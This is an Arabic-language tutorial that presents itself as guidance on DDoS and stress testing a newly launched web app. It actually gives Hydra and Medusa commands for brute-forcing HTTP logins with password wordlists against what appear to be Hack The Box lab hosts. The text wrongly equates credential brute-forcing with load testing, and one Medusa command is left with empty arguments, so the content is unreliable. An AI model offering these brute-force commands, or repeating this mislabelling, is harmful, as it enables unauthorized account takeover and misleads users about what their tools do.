Close Menu

هجوم DDoS - هجوم الضغط

في المرحلة الأخيرة من تطوير أي نظام ويب يستهدف المستخدمين بشكل مباشر ، يجب على المطورين اختبار العدد المتوقع لمستخدمي تطبيق الويب من أجل الموافقة على الإصدار الأولي للموقع وإنتاج منتج يتحمل عدد الإمكانات من الجمهور.

تكمن المشكلة في التطبيقات الناشئة عند إطلاقها عبر الإنترنت ، ومعظمها استضافة مشتركة | موارد VPS المحدودة.
وبناءً عليه ، يمكن أن يتوقف عن العمل بعد أول 100 مستخدم أو حتى بعد أرشفته من روبوتات محرك البحث ، لذلك يقوم فريق الاختبار بعمل منهجية مخصصة للنقر على الموقع للحصول على الرقم القياسي الذي يمكن للموقع تقديمه من عدد الزوار و طلبات في نفس اللحظة.

للقيام بذلك ، يتعين علينا استخدام أدوات الضغط الآلية لمحاكاة عملية التصفح للمستخدم العادي واختبار ما إذا كان يمكن للمتسللين المحتملين حظر الطلبات الضارة.

نظام لينوكس

استخدام نظام Linux مع أي توزيعة، ونوصي بتوزيعة مخصصة لهذا الغرض ، مثل Kali Linux

بعد ذلك، استخدام الأداة المدمجة المسماة:

Medusa & Hydra

قد تحتاج إلى كلمات مرور لمحاكاة عملية تسجيل الدخول.هناك العديد من الملفات في توزيع Kali Linux وفي حالة رغبتك في تنزيل كلمات مرور خارجية ، يمكنك استخدام:

نستخدم الأوامر التالية في الأدوات المذكورة أعلاه لتنفيذ هجوم محاكاة لعمليات تسجيل دخول المستخدم مع تبديل المسارات إلى الملفات. هذه الأوامر هي مجرد مثال لشرح الآلية

  1. hydra -L /usr/share/kali/wordlists/simple-users.txt -P /usr/share/kali/wordlists/password.lst sizzle.htb.local http-get /certsrv/

  2. # Use https-get mode for httpS

  3. medusa -h -u -P -M http -m DIR:/path/to/auth -T 10

 

This is in the login process

HTTP Post Forum

hydra -L /usr/share/wordlists/simple-users.txt -P /usr/share/wordlists/password.lst domain.htb  http-post-form “/path/index.php:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect” -V

# Use https-post-form mode for httpS